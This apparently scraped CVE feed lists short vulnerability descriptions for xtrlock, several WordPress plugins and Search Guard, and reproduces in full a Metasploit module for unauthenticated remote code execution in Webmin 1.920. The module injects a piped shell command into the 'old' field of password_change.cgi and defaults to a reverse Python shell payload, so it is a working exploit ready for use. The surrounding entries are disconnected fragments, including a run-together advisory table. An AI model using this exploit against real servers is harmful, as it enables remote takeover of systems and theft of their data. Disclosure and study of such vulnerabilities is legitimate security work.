xtrlock through 2.10 does not block multitouch events. Consequently, an attacker at a locked screen can send input to (and thus control) various programs such as Chromium via events such as pan scrolling, "pinch and zoom" gestures, or even regular mouse clicks (by depressing the touchpad once and then clicking with a different finger).

CVE-2016-10894: #830726 - xtrlock: CVE-2016-10894: xtrlock does not block multitouch events

An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.

**Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)**

**Platform:****Linux**

**Date:****2019-08-12**

  

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Webmin 1.920 Unauthenticated RCE',
          'Description'        => %q{
            This module exploits a backdoor in Webmin versions 1.890 through 1.920.
            Only the SourceForge downloads were backdoored, but they are listed as
            official downloads on the project's site.
    
            Unknown attacker(s) inserted Perl qx statements into the build server's
            source code on two separate occasions: once in April 2018, introducing
            the backdoor in the 1.890 release, and in July 2018, reintroducing the
            backdoor in releases 1.900 through 1.920.
    
            Only version 1.890 is exploitable in the default install. Later affected
            versions require the expired password changing feature to be enabled.
          },
          'Author'         => [
            'AkkuS <Özkan Mustafa Akkuş>' # Discovery & PoC & Metasploit module @ehakkus
          ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              ['CVE', '2019-'],
              ['URL', 'https://www.pentest.com.tr']
            ],
          'Privileged'     => true,
          'Payload'        =>
            {
              'DisableNops' => true,
              'Space'       => 512,
              'Compat'      =>
                {
                  'PayloadType' => 'cmd'
                }
            },
          'DefaultOptions' =>
            {
              'RPORT' => 10000,
              'SSL'   => false,
              'PAYLOAD' => 'cmd/unix/reverse_python'
            },
          'Platform'       => 'unix',
          'Arch'           => ARCH_CMD,
          'Targets'        => [['Webmin <= 1.910', {}]],
          'DisclosureDate' => 'May 16 2019',
          'DefaultTarget'  => 0)
        )
        register_options [
            OptString.new('TARGETURI',  [true, 'Base path for Webmin application', '/'])
        ]
      end
    
      def peer
        "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
      end
      ##
      # Target and input verification
      ##
      def check
        # check passwd change priv
        res = send_request_cgi({
          'uri'     => normalize_uri(target_uri.path, "password_change.cgi"),
          'headers' =>
            {
              'Referer' => "#{peer}/session_login.cgi"
            },
          'cookie'  => "redirect=1; testing=1; sid=x; sessiontest=1"
        })
    
        if res && res.code == 200 && res.body =~ /Failed/
          res = send_request_cgi(
            {
            'method' => 'POST',
            'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
            'ctype'  => 'application/x-www-form-urlencoded',
            'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
            'headers' =>
              {
                'Referer' => "#{peer}/session_login.cgi"
              },
            'data' => "user=root&pam=&expired=2&old=AkkuS%7cdir%20&new1=akkuss&new2=akkuss"        
            })
    
          if res && res.code == 200 && res.body =~ /password_change.cgi/
            return CheckCode::Vulnerable
          else
            return CheckCode::Safe
          end
        else
          return CheckCode::Safe
        end
      end
    
      ##
      # Exploiting phase
      ##
      def exploit
    
        unless Exploit::CheckCode::Vulnerable == check
          fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
        end
    
        command = payload.encoded
        print_status("Attempting to execute the payload...")
        handler
        res = send_request_cgi(
          {
          'method' => 'POST',
          'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
          'ctype'  => 'application/x-www-form-urlencoded',
          'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
          'headers' =>
            {
              'Referer' => "#{peer}/session_login.cgi"
            },
          'data' => "user=root&pam=&expired=2&old=AkkuS%7c#{command}%20&new1=akkuss&new2=akkuss"
          })
    
      end
    end

CVE-2019-15107: Offensive Security’s Exploit Database Archive

The all-in-one-wp-security-and-firewall plugin before 4.0.6 for WordPress has XSS in settings pages.

CVE-2016-10867: All-In-One Security (AIOS) – Security and Firewall

The events-manager plugin before 5.6 for WordPress has code injection.

CVE-2015-9298: Events Manager

Search Guard versions before 24.0 had an issue that values of string arrays in documents are not properly anonymized.

SGSA 162019-03-19When Cross Cluster Search (CCS) is enabled, authenticated users can gain read access to data they are not authorized to seeUpdate6.x-24.3floragunnSGSA 152018-12-13Field caps and mapping API leak field names (not values) for fields which are not allowed for the user because FLS was activatedUpdate6.x-24.0floragunnSGSA 142018-12-13Values of string arrays in data are not properly anonymizedUpdate6.x-24.0floragunnSGSA 132018-03-19Possible URL injection on login page when basePath is setUpdateKibana plugin 6.x-16floragunnSGSA 122018-08-24REST API leak password hashes (not cleartext) for users endpointUpdate6.x-23.1Thorsten Lutz, SySS GmbHSGSA 112018-09-14For aggregations, clear text values of anonymised fields were leakedUpdate6.x-23.1floragunnSGSA 102018-01-18Password dependent timing side channel in AuthCredentialsUpdate6.x-21.0@madblobfishSGSA 92018-04-09A Kibana user could impersonate as kibanaserver user when providing wrong credentialsUpdateKibana Plugin 5.6.8-7 and Kibana Plugin 6.x-12Guy MollerSGSA 82018-04-04Redirect and XSS vulnerability in Kibana pluginUpdateKibana Plugin 5.6.8-7 and Kibana Plugin 6.x-12Vineet KumarSGSA 7n/a2017-08-10DLS/FLS leaking information when multitenancy module is installed and “do not fail on forbidden” is activatedUpdate or deactivate “do not fail on forbidden”SG v15Guy MollerSGSA 6n/a2017-02-13FLS/DLS not working for regex index patternsUpdate or avoid regex patternsSG v11 and DLS/FLS module v6Guy MollerSGSA 5n/a2017-01-13Auditlog does not log all security relevant eventsUpdateSG V10Guy MollerSGSA 4n/a2017-01-05FLS/DLS not working for index patternsUpdateSG v10 and DLS/FLS module v5Matej ZerovnikSGSA 3n/a2016-11-27Wrong permissions resolution for certain index/type combinationsUpdate6.x-23.1Lucas BremgartnerSGSA 2n/a2016-11-25DLS not picked up when getting documents by IDUpdateSG v9 and DLS/FLS module v5Fabio CornetiSGSA 1n/a2016-07-28Authentication cache lead to password hashcode vulnerabilityUpdateSG V4Vladimir Gordiychuk

CVE-2019-13418: CVE - advisory - Search Guard

The ultimate-member plugin before 1.3.18 for WordPress has XSS via text input.

CVE-2015-9304: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

The simple-membership plugin before 3.5.7 for WordPress has XSS.

CVE-2017-18499: Simple Membership

The wp-live-chat-support plugin before 7.1.03 for WordPress has XSS.

CVE-2017-18508: 3CX Free Live Chat

The wp-ultimate-csv-importer plugin before 3.8.1 for WordPress has XSS.

CVE-2015-9306: Import All Pages, Post types, Products, Orders, and Users as XML & CSV

The FV Flowplayer Video Player plugin before 7.3.14.727 for WordPress allows email subscription XSS.

Tag

#perl